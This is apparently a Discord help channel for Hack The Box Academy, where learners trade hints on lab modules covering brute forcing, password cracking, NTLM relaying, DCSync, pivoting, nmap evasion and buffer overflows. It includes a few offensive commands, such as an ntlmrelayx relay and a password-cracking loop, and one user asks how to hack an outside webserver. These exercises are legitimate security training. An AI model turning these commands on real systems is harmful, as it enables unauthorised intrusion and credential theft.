#modules
I still have 13 modules
2x Tier 0
9x Tier III
1x Tier IV
and Attacking Common Applications two sections
It was in Login Brute Forcing; it is the first question under Service Authentication Brute Forcing. Here is the whole question: Using what you learned in this section, try to brute force the SSH login of the user "b.gates" in the target server shown above. Then try to SSH into the server. You should find a flag in the home dir. What is the content of the flag? I was able to log in to the SSH server, I just cannot find the flag, so I am assuming I have to do something to get to the home dir but I do not know what
Let me guess, the 2 thick client chapters?
Yes
The update to the thick client chapter made things a lot clearer
I tried yesterday but I am too stupid. I did not make it
Which bit did you get stuck on?
I didn't write it down because it didn't work at all.
I had a hell of a time with the Exploiting Web Vulnerabilities in Thick_client Apps part... I never did get it to work right
I would have to try it again, but I need enough motivation for that.
You have found the password and are logged in?
Then list the directory ls
did ls /home but that got me b.gates and m.gates not the flag, which is why I know I am doing something not correct to get to the home dir
when I did that I got /home/b.gates, so I did ls /home/b.gates and got flag.txt and rockyou-10.txt but again no flag for this question. I just do not understand this crazy question
OMG thank you
I thought my head was going to explode with this question.
I really appreciate the assistance
is it not possible to install xfreerdp on Parrot OS (HTB version)?
```bash
┌─[f0rk@parrot]─[~]
└──╼ $ sudo apt-get install freerdp-x11
Reading package lists... Done
Building dependency tree... Done
Reading state information... Done
Package freerdp-x11 is not available, but is referred to by another package.
This may mean that the package is missing, has been obsoleted, or
is only available from another source
However the following packages replace it:
  freerdp2-x11
E: Package 'freerdp-x11' has no installation candidate
┌─[f0rk@parrot]─[~]
└──╼ $ sudo apt-get install freerdp2-x11
Reading package lists... Done
Building dependency tree... Done
Reading state information... Done
Some packages could not be installed. This may mean that you have
requested an impossible situation or if you are using the unstable
distribution that some required packages have not yet been created
or been moved out of Incoming.
The following information may help to resolve the situation:
The following packages have unmet dependencies:
 freerdp2-x11 : Depends: libfreerdp-client2-2 (= 2.3.0+dfsg1-2+deb11u1) but 2.10.0+dfsg1-1~bpo11+1 is to be installed
```
did you try installing that dependency? sudo apt install libfreerdp-client2-2
I did
Try it like so
sudo apt-get install aptitude
sudo aptitude install freerdp2-x11
https://www.reddit.com/r/debian/comments/vcpcpe/cant_install_freerdp_neither_freerdp2x11/
This is what I am looking at atm
```bash
sudo aptitude install freerdp2-x11
The following NEW packages will be installed:
  freerdp2-x11{b}
0 packages upgraded, 1 newly installed, 0 to remove and 0 not upgraded.
Need to get 104 kB of archives. After unpacking 837 kB will be used.
The following packages have unmet dependencies:
 freerdp2-x11 : Depends: libfreerdp-client2-2 (= 2.3.0+dfsg1-2+deb11u1) but 2.10.0+dfsg1-1~bpo11+1 is installed
The following actions will resolve these dependencies:
     Keep the following packages at their current version:
1)     freerdp2-x11 [Not Installed]
Accept this solution? [Y/n/q/?] Y
No packages will be installed, upgraded, or removed.
0 packages upgraded, 0 newly installed, 0 to remove and 0 not upgraded.
Need to get 0 B of archives. After unpacking 0 B will be used.
Scanning application launchers
Removing duplicate launchers or broken launchers
Launchers are updated
```
Strange is, you don't see a newly installed package
LOL
```bash
sudo dpkg -i libfreerdp-client2-2_2.3.0+dfsg1-2+deb11u1_amd64.deb
dpkg: warning: downgrading libfreerdp-client2-2:amd64 from 2.10.0+dfsg1-1~bpo11+1 to 2.3.0+dfsg1-2+deb11u1
(Reading database ... 450654 files and directories currently installed.)
Preparing to unpack libfreerdp-client2-2_2.3.0+dfsg1-2+deb11u1_amd64.deb ...
Unpacking libfreerdp-client2-2:amd64 (2.3.0+dfsg1-2+deb11u1) over (2.10.0+dfsg1-1~bpo11+1) ...
dpkg: dependency problems prevent configuration of libfreerdp-client2-2:amd64:
 libfreerdp-client2-2:amd64 depends on libfreerdp2-2 (= 2.3.0+dfsg1-2+deb11u1); however:
  Version of libfreerdp2-2:amd64 on system is 2.10.0+dfsg1-1~bpo11+1.
dpkg: error processing package libfreerdp-client2-2:amd64 (--install):
 dependency problems - leaving unconfigured
Processing triggers for libc-bin (2.31-13+deb11u5) ...
Errors were encountered while processing:
 libfreerdp-client2-2:amd64
```
I got tired of installing tools on Parrot and went back to Kali...
you should say no
got it ; )
I did
```bash
chmod +x *.deb
sudo apt install *.deb
```
First day using Parrot OS. Got already a good experience
i'm stuck here
Password Attack Lab -Medium
Examine the second target and submit the contents of flag.txt in /root/ as the answer.
I'm in as the jason user, don't know further for dennis and root access
Thanks for the help @acoustic owl @tidal mango , I appreciate it.
for windows priv esc pillaging has anyone gotten this script to work to crack the password. I have the password from other means, just playing with it to figure out what its doing and trying to understand why its not working.
```bash
for password in $(cat /usr/share/wordlists/fasttrack.txt);do echo $password; python3 mremoteng_decrypt.py -s "EBHmUA3DqM3sHushZtOyanmMowr/M/hd8KnC3rUJfYrJmwSj+uGSQWvUWZEQt6wTkUqthXrf2n8AR477ecJi5Y0E/kiakA==" -p $password 2>/dev/null;done
```
Of course this is the example one, I even added the password to the wordlist and it still didn't find it.
You are on the system with ||SSH?||
yeah
check local ports : )
||a mysql server is open but i cannot access it with the user jason I get ERROR 1045 (28000): Access denied for user 'jason'@'localhost' ||
pm me with your command
hey
hello, I am in "Find the password for the ldapadmin account somewhere on the system" in winPrivEsc assessment one. Does anyone have a hint? I've been looking for quite a while now
how do i find the port of a url?
Still stuck?
I can change that. Pm me.
I'm going insane with the Broken Authentication Skills Assessment, any help would be appreciated.. I have the cookie I need from the user I can log in with but when I 'use' that cookie I get User cannot have requested role... I've tried it in repeater as well as dev tools, don't know where to go from here
dude can somebody join a vc with me i need help
Dude
Are you doing modules or still trying to help your friend
Because if you're trying to help your friend then ask for help in #community-content and you'll get usually better answers
i came for the hax; i stayed for @fathom pendant
You haxed my heart bbqgrill
does anybody have a birthday wordlist from dates like 01012000-12122010
so you're looking to generate something 01012000 >> 12312000 and repeat until 12122010 (i'm being like this on purpose)
either way; entertaining your off-topic discussion you should REALLY move this to #1024429874246590575 and post your questions there
as they are WHOLLY unrelated to academy content
dm if still working on it
Seems like I hit a nerve
#583613644294717453 would be a nice place to post private chats
Just think its ridiculous, if you ask for help and then tilt because I don't just give you the full solution
again that's airing saltiness that's not really necessary to do here
can we help you?
Still not asking a question
this channel is about asking questions regarding the modules found on https://academy.hackthebox.com
Well I'm new to everything, don't know where to start
if you're having questions regarding https://app.hackthebox.com please refer to #rules and #welcome and you'll have access to more parts of the server
shall i go for this
the https://academy.hackthebox.com/ has many fundamental (tier 0) courses that you can look at and learn from to learn without needing to spend money
Sorry, I meant it for people to know what they get themselves into when they try to help this person. I'll just move it somewhere to the image channel
all active boxes on the main app site are free
thank you will sure go for it right now
You can start with the "starting-point" stuff
It gives a good intro to how boxes work and different concepts
where should i filter this @manic magnet
thank you
@fathom pendant thank you for you as well for the resources
Beginnings in cybersecurity are not at all easy, especially when you are self-taught.
Even as a person that is at university for this stuff I feel like I know shit
Incorrect information in web requests module
Anyone working on the new windows module?
Module: Windows Attacks & Defense -- Kerberoasting
First task runs into issues with the given parrot vm
Attacking common services - hard lab has been solved!
If anyone needs hints they can read this:
https://forum.hackthebox.com/t/attacking-common-services-hard/259742/30
Additionally if anyone gets stuck on this module, you can dm me, I will be more than happy to help
Can I DM someone for DNS footprinting question 4? What is the FQDN of the host where the last octet ends with "x.x.x.203"? I have performed two zone transfers and found a bunch of domain names. All attempts to brute force a subdomain from any of the domains I have found have returned no additional results. Could I have a hint as to where to look for the answer?
You can dm me
Subdomains of subdomains
subdomainception
that's going to be potentially difficult to solve but there's a few things you can try
the core issue there is that your CPU is being picked up as "generic" by POCL
this happens a lot in VMs
and when we receive "generic" as a target, we can't actually complete kernel compilation at this time
pwnbox and hashcat are having issues on the eu-servers rn afaik; the US ones work alright though
note this was info provided by Jared at some point when it first started occurring
Is there a limitation of GenericAll on Domain Admins? In one of the labs I first added a user to a group that has Generic All over Domain Admins and then wanted to add the user to Domain Admins. But that fails due to lack of privs.
Can confirm, not working here in the EU.
any chance you know of anyone on the HTB side working to fix that? I may be of some use
the US ones
US 1 and 2 seem to be working from what i've been told
- note I use my own VM running parrotOS so it's not an issue for parrotOS just those instances for some weird reason
probably older gen or potentially intel CPUs
the problem is that the version of POCL installed doesnt have the specific CPU as a mapped target device
so it cant supply a good compilation target for hashcat
again it's something weird on the EU docker instances @west canopy hashcat works fine on the US instances for academy yeah?
doesnt seem like its anything too weird, just a CPU/runtime miss-match
this happens fairly often
yeah
how would one fix that?
I don't think WE the end-users can fix it
Ah ok sry
That would be interesting true
well, in theory you could change out the POCL runtime with one that supports that hardware better
really that's all that's needed
POCL supports many, but not every device and sometimes all thats needed is an update to a more recent version for a device to be better supported
hehe
lol, don't trust chatgpt for hashcat stuff
we get enough of that to know its more wrong than right
Why not, its not a uncommon issue you mentioned
yes but even in the response you got it's not really giving you relevant asnwers...
we dont have a list of supported CPUs on our website
and OpenCL drivers for GPU arent going to help your CPU lol
it gave good looking answers, but not correct ones
Ok
but yeah, this is just a matter of making sure the computing device and runtime agree with eachother
i've not seen many 3rd gen Epycs w/ POCL under hashcat
So since hashcat supports the 4090 now, did you see Kevin Mitnick's 24x 4090 setup?
hard to say if that specific model works with POCL or what version
haha yeah i saw it
i cant say i'd do Exactly what he did
but its not terrible, its off the shelf fluidworks hardware
Pretty sure hes just goofing around
more money than sense, as they say
Anyway folks, if you run into issues with hashcat in the Windows Attacks & Defense module, at least for now, avoid the pwnbox
on eu
Yo can someone that is much smarter than I am help me out with the VPS hardening section?
https://academy.hackthebox.com/module/87/section/906
but what is your actual question; what is the module and section name? I don't feel like opening the link
"help with this" but what are you actually having trouble with
Yeah thats fair, basically If I am editing these text files correctly for the SSH config settings.
These bits.
I thought I edited the docs right, but it breaks SSH for some reason
not sure really haven't done that module or at least it doesn't look familiar to me ¯\_(ツ)_/¯
but that definitely clarifies what your actual question is
No worries, I'm just going to re-install the VM and try again lol
breaking things is not fun xD
What module is that? it looks cool
Maybe I posted in the wrong channel but its this path
I completed that one, dont think it was to difficult
ahh its been updated
nvm
question didnt ring a bell
Yeah the general knowledge stuff isn't terrible, just been trying to fix the SSH config issue I am having. But I might have broke the config, idk I am just starting from scratch since I am not too deep
Sounds like a solid plan my friend
big shoutout to @rustic sage for helping me with the footprinting: DNS module. I would have been stuck a lot longer if not for his help
much appreciated
I am glad I could help. Keep helping others
Cheers.
last 5 parts of linux fundamentals
Yep we're still working on it
In the Active Directory LDAP module LDAP Anonymous Bind section -- The last question is "What OU is the user Kevin Gregory part of (one word, case sensitive, i.e. Marketing)? ". I cannot figure out how to get OU information back with an anonymous bind. Can anyone help me out?
any tips on Identify the username of the user that has a position of 736373 through SQLi. (Web Service and API attacks module).
are you locked to that type of hardware for the underlying instances?
because that may be the fastest/easiest way to fix it
Mind if I DM you?
sure
I wish to grab the first 100 packets with tcpdump which switch will you use ?
I already tried using -c (count) 100
anyone good in java?
I'm a little stuck on the "PIVOTING, TUNNELING, AND PORT FORWARDING" Skills Assessment, final question. ||I think I've found the DC on 172.16.10.5 but it's not letting me RDP into it.|| Can I have some tips what to do next?
feel free to dm
head -100?
I'm going to try tomorrow
but i got use it with other switches
-nnvXX
After your tcpdump command you need to pipe the output to head which will grab it's first 100 lines.
is this specific to tcpdump?
Yep
I was trying with -c but it didn't work
-nnvXXc 100 Like this
but didn't work
this might help:
I am not on my machine or I would experiment with it
Ty, but like i said I already tried those switches
you have a problem with reading: is your problem related to an academy module?
the website i linked is about asking your question better instead of "anyone good in java" ask your question more directly
the funny part is that anyone good in java is literally the example used
like that site applies to asking questions in general, but it is most applicable to neo here than it has been to anyone else.
Hey, is anyone online and can help with password attacks module hard lab?
Well, I'm at skill assessment hard lab trying to crack Johanna's password. Tried with password.list and mut file with no success and moved from hydra to crowbar to crackmapexec.. am I on the right path?
what service are you trying to crack it on
hi I am trying to do the if-else statement challenge in intro to bash module in academy and I am getting "bad substitution" errors and other errors and if someone could help me out that would be great. Here is my code:
```bash
#!/bin/bash
var="8dm7KsjU28B7v621Jls"
value="ERmFRMVZ0U2paTlJYTkxDZz09Cg"
in_var=true
for i in { 1..40 }
do
var=$(echo $var | base64)
if ( $i in $var )
then
$in_var=true
else
$in_var=false
fi
done
if $in_var
then
for i in $var:
do
echo $i >> var.txt
done
tail -c 20 var.txt
fi
```
I don't get it. Should I use another for-loop? I need to check if all variables in value are in var. Then if they are I need to print last 20 characters of var if var is greater than 113450 characters.
What am I doing wrong?
can someone help me out?
I know this question is asked a lot, I'm working on the DNS section of the footprinting module, I'm trying to enumerate the subdomains of the subdomains but I'm getting NS record query failed results and I'm not sure how to proceed, anyone available to DM?
I am trying to do privilege escalation, I am running the http server in the same directory as the linPeas.sh and I am calling it in the victim shell, but i am getting connection timed out, I have tried the tun0 and another ipaddress, but I am getting the same thing for both, so what Ip address should I use?
hi, are there any one accessed as root in busque machine ?
Dnsenum with the right list will get it for you if you give it the right x.inlanefreight.htb subdomain
I've been trying with a few lists, I keep getting NS record query failed: Refused, should I be changing the nameserver used with Dnsenum to a different IP than provided?
No
Also if you have inlanefreight.htb in your /etc/hosts file, you're not going to get it
I didn't, so essentially I should just go through all the subdomains that I find from the zone transfer of the domain?
I'm dumb found it thanks
no one wants to give me a hint with my code?
This is normal you're going to use the user/pass with sqlplus as shown in the module
I was able to connect to the http server for the privilege escalation, but when I download the files, i am getting Read error connection reset by peer, how do I fix that?
dnsenum on all of the subdomains (x.inlanefreight.htb) with a fierce list
In the module for SMB on common attack services stuff, it talks about forced authentication after getting the password from responder
Then it uses Forced Authentication Attacks
```bash
@htb[/htb]$ impacket-ntlmrelayx --no-http-server -smb2support -t 10.10.110.146
```
but I am not understanding where the authentication to dump hashes is coming from here? I don't see a hash being passed or password being used
Hello guys, my mom's phone was hacked by remote control I guess? What should I do guys?
Stuck in the skills assessment of os command injection module
Don't know where to inject the command
Anyone here done with that module ?
Hi fellows, can someone help with Using Crackmapexec module assessment, I have pwned the SQL server and got a couple of sets of credentials, but I can't figure out how to continue with the DEV server, any nudge will be appreciated, thanks
Take a look at the database
I need help, my friend's account got hacked by another 'friend', I only have the hacker's number. It happened over Facebook so if someone can tell me what to do, to get it back or to help me I would be really thankful. Facebook support doesn't help. It happened less than 72h ago. Please tag me, like @ me to get my attention if I don't respond.
We cannot help you
Hi Guys, I'm working on the Linux Buffer Overflow x86 module and have a question when we compile the C program
```bash
gcc bow.c -o bow32 -fno-stack-protector -z execstack -m32
```
Oh no thats sad
-o = output file, -fno-stack-protector = disable stack protection, -z = to build an executable file, and -m32 for the 32-bit version
is that correct?
I need help for LOGIN BRUTE FORCING, Service login. I've generated a custom password list using cupp and most information I can find about harry online but I still can't get it to work, looking to get a nudge
have you checked the hint?
Wow people are really terrible at asking good questions on this discord. I guess maybe we should have some sort of question template or something
though I wonder if it would ever actually get used
Well just gave it another shot at hydra and got a password that's not working..
Morning folks
Still stuck?
I can help you out
Yep
Let's go dm
Hey have anyone had contact with such an error in Eyewitness
[] Selenium not found.
[] Please run the script in the setup directory!
???
Fixed nvm
#Module: Windows Privilege Escalation
#Section: Communication with Processes
The "Named Pipes" portion mentions Cobalt Strike. I don't see any modules for it on academy, and it looks like you need a license to use it. Is this something I'm going to need for the CPTS? Where/how can I get practice with it?
in the nmap module it is said that the decoys used with the -D RND:5 option must remain alive. what does that mean?
I understand this as that the IP's you use as decoys need to be valid (I guess for example they correspond to real ip's in the network)
Also this can mean that the connection needs to be kept alive. Such that the target does not think it is syn flooded
You can read more about it here:
https://www.ionos.com/digitalguide/server/security/syn-flood/
I thought so too. It still scratches my brain a bit. Like what if the RNG IP is VALID and someone is using it... wouldn't that mean we are essentially using resources that belong to someone else?
let alone masking (potentially) criminal behavior?
I mean pulling someone that isn't involved in the contract into our test
I mean it depends on the security mechanism that they have in place. I mean you can just use internal IPs. I guess they refer more to my second explanation
Help
Like don't use "new" syn's but rather keep the connection alive meaning continuing the already established connection
what do you need help with ?
I will dm you with more information on that topic if you want
No it's ok... it's just an interesting legal question
This is from the nmap website:
Note that the hosts you use as decoys should be up or you might accidentally SYN flood your targets. Also it will be pretty easy to determine which host is scanning if only one is actually up on the network. You might want to use IP addresses instead of names (so the decoy networks don't see you in their nameserver logs). Right now random IP address generation is only supported with IPv4
Don't know about CPTS part but as part of my CRTO subscription I have access to a lab that has a licensed copy of cobalt strike. I think you need to buy CRTO subscription and then another subscription to access the labs, it will still be cheaper compared to buying cobalt strike.
No, a license from Cobalt Strike is not required for CPTS
@acoustic owl But do I need to be familiar with using Cobalt Strike on the CPTS exam?
nope
If I wish to start a capture without hostname resolution, verbose output, showing contents in ASCII and hex, and grab the first 100 packets; what are the switches used? please answer in the order the switches are asked for in the question.
||-nnvXXc 100||
hello guys i want to ask how to hack into a webserver that is outside my network using metasploit
elaborate
I don't know what I'm doing wrong
Do you get an error ?
yup
Can you dm me the error ?
Metasploit is explained here
https://academy.hackthebox.com/module/details/39
but thats the error wym?
Didn't you just say that you get an error, when I asked ?
anyone able to give me a nudge on the last pivot on the Tunneling, Pivoting module?
it's just a question from the hackthebox academy module
For this question?
Submit the contents of C:\Flag.txt located on the Domain Controller.
Ah sry. I thought you asked it in general. Please specify next time that you have problem with a question on a module xD
my bad lmao
I haven't done the module yet but maybe specify them in singles like ||-nn -v -XX -c 100|| ?
nope, error
I will dm you with another thing I found
yeah that's the one... I know the IP is .45 and I got the creds for mlefay and vfrank... but rdp and ssh to .45 ain't working
am i missing something?
Take a look at the network drives
hmmm, i see
academy is down and out. TLS error.
What is a science fair topic that would get me a gold medal?
wrong channel
Oops sorry
working again (at least for me)
Hi I just wanted to follow up since it seems like no one wants to help me with my BASH code for the intro to BASH module.
hi I am trying to do the if-else statement challenge in intro to bash module in academy and I am getting "bad substitution" errors and other errors and if someone could help me out that would be great. Here is my code:
```bash
#!/bin/bash
var="8dm7KsjU28B7v621Jls"
value="ERmFRMVZ0U2paTlJYTkxDZz09Cg"
in_var=true
for i in { 1..40 }
do
var=$(echo $var | base64)
if ( $i in $var )
then
$in_var=true
else
$in_var=false
fi
done
if $in_var
then
for i in $var:
do
echo $i >> var.txt
done
tail -c 20 var.txt
fi
```
I don't get it. Should I use another for-loop? I need to check if all variables in value are in var. Then if they are I need to print last 20 characters of var if var is greater than 113450 characters.
What am I doing wrong?
Need some help, don't know why I can't wrap my head around this.. I need to get a file onto a computer that I have used chisel to proxy to. My attack computer is chisel'd thru a 10.129.x.x host to a 172.16.x.x host. the 10.129.x.x host obviously has a 172.16.x.x interface and I'm able to RDP to the third device. How do I get a file thru the chain to the third device in the chain?
ChatGPT might be helpful, have you tried it?
hey guys, i'm having difficulty with the nmap service enumeration medium lab in regards to grabbing the DNS version
i'm aware that port udp port 53 is open, however whenever i attempt to connect with nc whether it's from source port 53 or not onto udp port 53 it just doesn't display anything
any tips?
add verbose
has anyone finished the Coder machine?
@fiery berry i get the same result as my normal nmap scan
use NSE
it gives me NLnet Labs NSD
can i get the service with using exclusively nmap?
or is nc involved
sorry haven't seen that is for the medium lab
I didn't use any nse though
cant remember if i specified to run it on udp as opposed to tcp
just a scan with the right arguments will do as well
@rustic sage dm
Did you solve it without NSE scripts
yes
Can I send you a DM?
sure
Can someone please help me with the Module: File Inclusion. Section: Log Poisoning. Question: "Use any of the techniques covered in this section to gain RCE, then submit the output of the following command: pwd". My issue is that I receive a 500 internal service error when trying to replace the user agent value with a simple php webshell. Can someone please assist?
Has anyone finished the Windows Attacks & Defense module?
I'm stuck in the PKI - ESC1 section on the second question.
" After performing the ESC1 attack, connect to PKI (172.16.18.15) as 'htb-student:HTB_@cademy_stdnt!' and look at the logs. On what date was the very first certificate requested and issued? "
Actually I think it should be quite simple.
But I am missing something. My answer is not accepted.
|| Both IDs 4668 and 4667 have the first entry on 12/19/2022. ||
But this answer is not accepted
Has anyone completed the hackthebox academy file upload skill assessment and can hmu with a hint?
I'm 3 hours on this and haven't figured it out 
There are double quotes in the log. You will break the log if you use double quotes for your payload.
anyone thats done the file upload attacks assessment able to assist? i think i was able to get my payload uploaded but unable to to get the file location. and im not sure where i can put an xxe payload thatll work to get the php code
Anyone assist with this?
#Module: Windows Privilege Escalation
#Section: Communication with Processes
Named Pipes Attack Examples
Module has been great so far. I'm under the impression that I should be able to accomplish these escalations manually. Though the only link provided is to a metasploit module. Is this sufficient, or should I learn to do this manually? If I should do it manually, where/how can I learn about named pipe usage in windows; google searches offer decent examples, but not much feed back into errors/specific use cases.
get out of here with that.
Damnit I missed it
Can I dm you?
sure
well I was able to get the flag after a bit of cheesing but I still don't know how to get the xxe payload to work on the assessment with it being reflected back the way that it is
would anyone be able to explain this to me since it wasn't a huge part of the module
Hi Guys
So i am doing module Public Exploits
I have done a metasploit search for the wordpress plugin and found
auxiliary/scanner/http/wp_simple_backup_file_read normal No WordPress Simple Backup File Read Vulnerability
I am guessing this is the correct one.
I set the rhost ok to the ip address of the web server ok
When i go to set the LHOST to tune0
I get the following error
Unknown datastore option: LHOST. Did you mean VHOST?
If anyone can help with this one I would be really grateful.
Many Thanks
Kapz
I'm in the Active Directory Enumeration and Attacks module and getting an error when trying to install secretsdump.py. It gives the error of "not found". I'm using $ git clone URL of repository and getting this fatal repository error. Has anyone else seen that?
try impacket-secretsdump
Not tune0, tun0
But also this exploit does not have an LHOST option
Thank you! That was very helpful.
type options and see if lhost is really an option, in case of most web exploits a reverse shell is not necessary because you will get a web shell
Can i dm you?
This exploit is a file read exploit, no shell
Thanks for pointing that out, I hope it's resolved on their end.
It's just they probably wanted to set all options and didnt execute or run it
Sure
Do anybody here have experience in extracting files with volatility3? Command I tried did not work, An example: python3 vol.py -f image-file windows.dumpfiles --pid 216 -D /tmp/ ,also tried ..... windows.dumpfiles -o <memory address> -r filename-to-dump.pdf.lnk -D /tmp/
What module is this for?
If you are having issues with the file inclusion module, feel free to send me a message.
Bees nuts
I'm in the Active Directory Enumeration and Attacks module in the DCSync section and could use some guidance. I realize that I need to set up a tunnel to the Domain Controller, but everything I've tried thus far has failed. Any hints on this?
Ok the final nmap practice is beating me... I tried stealth scan, simple scan, UDP scan, and now I'm trying ACK scan which is taking FOREVER. I think I just didn't understand the question and situation. anyone care to elaborate and explain what is going on there?
The nmap hard assessment?
yes
Follow the IDS/IPS evasion section
Ok but why? how could I have guessed that?
Because up until this one you haven't needed to really put that section to use
And it was introduced prior to the assessments
If you're asking about the port try doing a scan with --source-port 53 iirc that gets you the mystery one
I mean the labs easy to hard in the nmap module are all about IDS/IPS Evasion.
Yes
But not really
The easy/med do not require any evade techniques
The hard is where it pops more
Yeah, I know but what I mean is that they are all in the subsection of IDS/IPS Evasion:
Technically under subsection "bypass security measures"
yeah ok xD
But I'm saying this as someone who's sanity checked this module many times
Also according to Jared the lineup is intentional
Which isn't uncommon in modules
Well I tried --source-port 53 with -sT and -sA. I'm not banned from the service... I get ssh and http. both aren't the answers. I have no idea.
wait.. one last try
The ban is a few minutes
I've given you the info on how to get what you're looking for
I honestly have no idea... I need the reasoning; I feel like I'm shooting in the dark.
There is some more stuff on this section of the module that you didn't mention that you tried. Try reading it again. Maybe you will find some more stuff to use π
Just... Read the section it tells you EVERYTHING
can't say much more without spoiling
I didn't try choosing a DNS server, as it seems there isn't one... I didn't try designating an interface.
I'm using mimikatz as described in this section and I'm getting an error of ERROR kuhl_m_lsadump_dcsync ; GetNCChanges: 0x000020f7 (8439) instead of giving me the hashes as described. Any idea why I'm getting this strange error?
Remember that you can also chain the evasion techniques
Just try everything that gives a positive output in the examples
That error is for not running Mimikatz with elevated privileges. Are you running it from an elevated command prompt?
Yes, thank you for letting me know. I'll try it without elevated privileges.
Nope, still getting that same error even running it with standard creds.
Then you need to get Admin creds somehow. Or a user that is able to replicate directory changes.
Got it! Thank you!
Just for my understanding: if I port forward through SSH (via the host 10.129.10.20), say my local port 1234 to port 22 on the host 172.39.10.2, then the response that 172.39.10.2 sends back via 10.129.10.20 is forwarded back to me again? (I am doing the module on port forwarding and tunneling)
Ok, I just need an answer on how to get the thing... I am doing -sA --source-port 53 and the scan is taking FOREVER because of the service scan.
the answer is in the section
that's not helpful.
go through the whole part of the IDS sub-section "DNS Proxying"
I don't see a DNS to proxy from...
that
READ the section
read what it's telling you to do under that part
that will get you the answers
Yea I don't see it...
Look at the examples given that are below that section (the Scan parts)
What section are you on?
can I dm you ?
are you talking about this sudo nmap 10.129.2.28 -p50000 -sS -Pn -n --disable-arp-ping --packet-trace --source-port 53 ?
yes
hi guys, I keep coming here to get help with my code. I get a few suggestions. If I could DM someone to get help figuring out the answer, that would be great. Please don't give me the answer though; I want to learn and I only learn if I figure it out. This is for the Intro to BASH module.
Here is my code:
```bash
#!/bin/bash
var="8dm7KsjU28B7v621Jls"
value="ERmFRMVZ0U2paTlJYTkxDZz09Cg"
in_var=false
# no spaces inside the braces, otherwise bash does not expand the range
for i in {1..40}
do
    var=$(echo $var | base64)
    # "var" must contain "value" and be longer than 113,450 characters
    if [[ "$var" == *"$value"* && ${#var} -gt 113450 ]]
    then
        in_var=true
    else
        in_var=false
    fi
done
if [ "$in_var" = true ]
then
    # print the last 20 characters of "var"
    echo "${var: -20}"
fi
```
Yes, you can DM me.
As I said... I am currently running -sA --source-port 53 and the scan is still ongoing...
remove the specified port and obviously change the IP to your target
cancel that scan
Ack scans take forever to begin with
sudo nmap -sA --source-port 53 -p- -sV -n --disable-arp-ping -Pn 10.129.2.47 is what I am running.
AAANNDDD target just died.
X_X
hey, dm
also add -p-
I asked the same thing multiple times and no one wants to help me. Am I just not liked here? What am I doing wrong to the community? It's like I'm a ghost or something.
lmao
how can i help you?
Someone just sent me a message about the pivoting module and I misclicked ignore
pls DM me again π
I asked my question above. I am doing these instructions:
Create an "If-Else" condition in the "For"-Loop that checks if the variable named "var" contains the contents of the variable named "value". Additionally, the variable "var" must contain more than 113,450 characters. If these conditions are met, the script must then print the last 20 characters of the variable "var". Submit these last 20 characters as the answer.
Here is my code. I would like someone to help me figure out the answer. If you could DM me that would be great:
```bash
#!/bin/bash
var="8dm7KsjU28B7v621Jls"
value="ERmFRMVZ0U2paTlJYTkxDZz09Cg"
in_var=false
# no spaces inside the braces, otherwise bash does not expand the range
for i in {1..40}
do
    var=$(echo $var | base64)
    # "var" must contain "value" and be longer than 113,450 characters
    if [[ "$var" == *"$value"* && ${#var} -gt 113450 ]]
    then
        in_var=true
    else
        in_var=false
    fi
done
if [ "$in_var" = true ]
then
    # print the last 20 characters of "var"
    echo "${var: -20}"
fi
```
thank you
or if someone could help me here that works too
ok now why did the -sS work and the -sA not?
but don't give me the answer, help me figure it out
no idea sorry queue
dm
Will do thanks.
Because of how they work; SYN and ACK are two different types of packets
I figured that much... I am looking for a more in-depth explanation though, thanks
I appreciate the effort; however, I understand how a handshake works, it still doesn't explain why the different scans show different results.
Ack is basically the third step of the handshake so it doesn't necessarily expect a response back
Where syn is the start
So with syn (and source-port 53) you're saying "Hi do you know about x machine?"
Syn-Ack "sure here is the info"
Ack "thank you"
Hello, I'm stuck on the last question of the Buffer Overflow on Linux module skills assessment. Not sure why I'm not getting a reverse shell, I think I did it correctly...
Can someone help?
Does anyone know why it is ok to use 0.0.0.0 here as a destination ip?
0.0.0.0 means all interfaces
So it can listen through any host/subnet
Which is why when you start http.server through python it starts the service on 0.0.0.0 {specified port, 8000 default}
Technically yes and no in order for it to send it also needs to listen, no?
selling unturned cheats
But in short: 0.0.0.0 address just signifies any way that the system is accessed
So it's regardless of any VPN connection
It listens on any, but it makes the connection to the specified ip/port.
Don't care didn't ask + not relevant
I am confused π
DM me
Hey, I am in the same spot. I think I did it correctly too but can't seem to move forward.
any tips on the WordPress skills assessment? I've done every question and have shell access to the WordPress machine, yet I still can't find the flag for this question
Use a vulnerable plugin to download a file containing a flag value via an unauthenticated file download.
I've exploited the plugin, I just don't have a clue what file it is I need to read
So I've been going through the Intro to SQL Injection Fundamentals module. I have to say this module is lacking a lot of points on what SQL is, what it does and how it works. Fortunately there are a lot of resources online if you want to better understand SQL languages and how SQL injection works, but I have to say I wasn't too impressed with the SQL module, as it looks like they were trying to compress the understanding of SQL while producing complex SQL attacks. I hope HTB puts more work into their modules and has more respect for their topics going forward, as from what I've seen of this one I believe it needs a complete overhaul
Most modules I have taken are really good
@manic magnet so far everything before the SQL intro has been good as well, and I completely understand these modules are only meant to be primers on the topics they cover, but I believe they should at the very least provide resources within the module to go elsewhere if you want to expand your knowledge on the subject. Most of the ones before have done so, though the SQL module is completely lacking any quality links
can I have any more of a hint? I'm clueless at this point. Nevermind, got it. I was trying to use LFI to read the file... doh
there are gaps here and there in certain modules... in some cases poorly formulated questions. Which, as frustrating as it is, helps build patience and the ability to deduce things. However, other times it's just downright absurd.
For instance, I am doing SQLMap Essentials and the module is not arranged properly... for some reason I am learning how to build attacks before learning how to enumerate databases using the tool.
@iron plaza my fear with the modules is that HTB may neglect to mention other sources that would be better and more exhaustive than HTB would be able to be, because they are conflicted with maintaining your time on their site
They don't need to maintain your time on the site as they are not selling ads, plus you are already paying them. But to address your point, this is where you need to build your ability to proactively seek out other resources and information on your own
Also as far as other resources: there's generally a link or two for further discovery. And Google is one of the best resources. Another is ippsec
@fathom pendant Yeah, good to know, it's just another reminder that cyber security is a big discipline that requires a lot of dedication to understand, let alone master; no resource would ever be able to call itself the most comprehensive in any area with how fast this field evolves
Hello! Sorry, I'm having trouble with a question. I'm in the module Intro to Windows Command Line, in the section on Environment Variables, and I'm really sure that the answer to the question is "System Environment Variable". I've been trying all the combinations with this kind of concept like "system", "system variable", "global", "global variable", "global variable scope" and I don't know if it is an error in the question or just my answer is wrong π
Help pls!!π
The question is
What variable scope allows for universal access?
And the hint is:
We want it to be accessible around the world of our operating system
Should be "global variable"
"Global Variable"
Sometimes some modules are case sensitive
Or Global
I've already tried that but it doesn't work, could it be an error in the question?
Actually that's the answer (I'm really sure) but it looks like it isn't
Weird
Yeah...no... It uh...it should be "Global"
No quotes or anything
But I just checked
